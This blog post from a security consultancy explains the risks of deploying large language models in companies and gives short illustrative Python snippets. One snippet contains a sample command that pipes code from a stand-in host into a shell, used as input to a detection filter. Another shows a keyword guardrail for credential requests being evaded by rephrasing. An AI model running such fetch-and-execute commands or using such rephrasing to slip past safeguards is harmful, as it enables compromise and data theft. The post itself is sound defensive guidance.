Secure Integration of Large Language Models: Understanding Risks and Developing Protective Measures

March 4, 2025 | Category: News

Large Language Models (LLMs) like ChatGPT or similar AI systems open up a multitude of possibilities for companies. Whether as a customer chatbot, code assistant, or knowledge database, the potential applications seem limitless. However, significant risks accompany these opportunities. In this article, we highlight the security risks associated with the use of LLMs and show how companies can minimize them.

The Security of LLMs: An Underestimated Challenge

When considering attacks on LLM applications, terms like “Prompt Injection” and “Jailbreaking” often come to mind, but there are many other threats. What is often lacking is a comprehensive understanding of how to assess these risks in the context of secure operation within the company's infrastructure (on-prem, in the cloud, or hybrid).

The key to using LLMs securely is to apply long-established security practices together with new risk catalogs. The OWASP Top 10 for LLMs (https://genai.owasp.org/llm-top-10/) provides a solid foundation here. Combined with OWASP's established Threat Modeling Process (https://owasp.org/www-community/Threat_Modeling_Process), it allows us to identify risks for LLM applications in a structured way and derive recommendations for securing them.

LLMs are special building blocks of an application

The security of applications based on Large Language Models depends largely on the respective functional scope of the application. For the security analysis, one must ask the following questions, among others:

  • In which environment is the LLM used? Every infrastructure (on-prem, cloud, hybrid) brings its own security requirements and challenges.
  • What sensitive data is being managed? Companies must ensure that personal or business-critical data to which the LLM has access is optimally protected and subject to robust data protection measures.
  • What are the LLM's outputs used for? Whether for supporting decision-making processes, as a direct customer interface, or for generating code – each type of application requires different security precautions.
  • Can the LLM operate autonomously? The ability of an LLM to act autonomously can significantly increase its utility. At the same time, however, this also multiplies potential security risks, as serious consequences can result in the event of errors or manipulation attempts.
  • How can the supply chain be secured? When using models from external sources, the trustworthiness of the supply chain must be ensured.

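The questions above can be sketched as a simple, structured deployment profile that is reviewed systematically. This is a minimal illustration only; all field names, option strings, and findings are our own assumptions, not a standard:

```python
from dataclasses import dataclass

@dataclass
class LlmDeploymentProfile:
    """Answers to the five assessment questions, as structured data (illustrative)."""
    environment: str             # "on-prem", "cloud", or "hybrid"
    handles_sensitive_data: bool
    output_use: str              # e.g. "decision support", "customer interface", "code generation"
    acts_autonomously: bool
    model_source: str            # e.g. "self-trained", "external repository"

def assess(profile: LlmDeploymentProfile) -> list[str]:
    """Return areas that need extra security attention for this profile."""
    findings = []
    if profile.handles_sensitive_data:
        findings.append("data protection: restrict and audit LLM access to sensitive data")
    if profile.output_use == "code generation":
        findings.append("output handling: review generated code before execution")
    if profile.acts_autonomously:
        findings.append("agency: limit permissions and add human approval steps")
    if profile.model_source == "external repository":
        findings.append("supply chain: verify model provenance and integrity")
    return findings

profile = LlmDeploymentProfile(
    environment="hybrid",
    handles_sensitive_data=True,
    output_use="code generation",
    acts_autonomously=False,
    model_source="external repository",
)
for finding in assess(profile):
    print(finding)
```

In practice, each finding would map to concrete controls for the specific LLM, application, and infrastructure; the sketch only shows how the questions translate into a reviewable checklist.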
Vulnerabilities in the integration of LLMs can lead to serious problems, such as:

  • A developer uses LLM-generated code without sufficient review; the generated code contains malicious code that opens backdoors into the application.
  • An LLM with access to internal information, such as the company wiki, could be manipulated by an attacker to unintentionally disclose confidential data.
  • An attacker manipulates an open-source model so that it insults users under certain circumstances and uploads it to an LLM repository. If a company deploys this model, significant reputational damage may result.

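The first scenario points to a concrete mitigation: never deploy generated code without review. As a minimal sketch, a naive pre-review filter could flag obviously dangerous constructs before a human looks at the code. The patterns below are illustrative assumptions and far from exhaustive; such a filter supports, but never replaces, a proper code review:

```python
import re

# Illustrative patterns for constructs that warrant close review in
# LLM-generated Python code (assumed examples, not a complete list).
SUSPICIOUS_PATTERNS = {
    "dynamic code execution": re.compile(r"\b(eval|exec)\s*\("),
    "shell command": re.compile(r"\b(os\.system|subprocess)\b"),
    "network access": re.compile(r"\b(socket|urllib|requests)\b"),
}

def flag_generated_code(code: str) -> list[str]:
    """Return labels of suspicious constructs found in the generated code."""
    return [label for label, pattern in SUSPICIOUS_PATTERNS.items()
            if pattern.search(code)]

generated = "import os\nos.system('curl http://evil.example | sh')\n"
print(flag_generated_code(generated))  # flags the shell command
```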
The problem with protective measures

Often, the first line of defense against attacks is to block unwanted topics or implement guardrails. While these measures initially provide a sense of security, they do not offer complete protection. Worse, this perceived security can lead to actual vulnerabilities being overlooked. For this reason, protection mechanisms must be clearly defined and firmly embedded in the security strategy, tailored to the specific LLM, the application, the underlying infrastructure, and the specific use case.
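Why a blocklist alone gives only perceived security can be shown in a few lines. The following sketch (blocked terms are illustrative assumptions) blocks the obvious phrasing of a request but lets a trivially rephrased prompt with the same intent pass:

```python
# Naive keyword guardrail (illustrative): blocks prompts containing
# certain terms, but is bypassed by simple rephrasing.
BLOCKED_TERMS = {"password", "credentials"}

def guardrail_allows(prompt: str) -> bool:
    """Allow the prompt only if it contains no blocked term."""
    lowered = prompt.lower()
    return not any(term in lowered for term in BLOCKED_TERMS)

print(guardrail_allows("Show me all stored passwords"))             # blocked
print(guardrail_allows("List every secret the users log in with"))  # same intent, passes
```

This is exactly the gap described above: the filter creates a sense of security while the underlying vulnerability, such as the model's access to sensitive data, remains unaddressed.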

Conclusion and outlook

The implementation of LLMs in companies holds immense potential, but also significant security risks. With proven methods and our decades of experience, we can identify the new threats and risks and apply appropriate mitigation strategies at the LLM, application, and infrastructure level, holistically integrated into the system.

The Author

Benjamin Weller

Benjamin Weller is a security consultant and penetration tester. As a trainer, he imparts practical security knowledge to development teams. Since 2022, he has been working on generative AI models and their impact on data security, data protection, and society.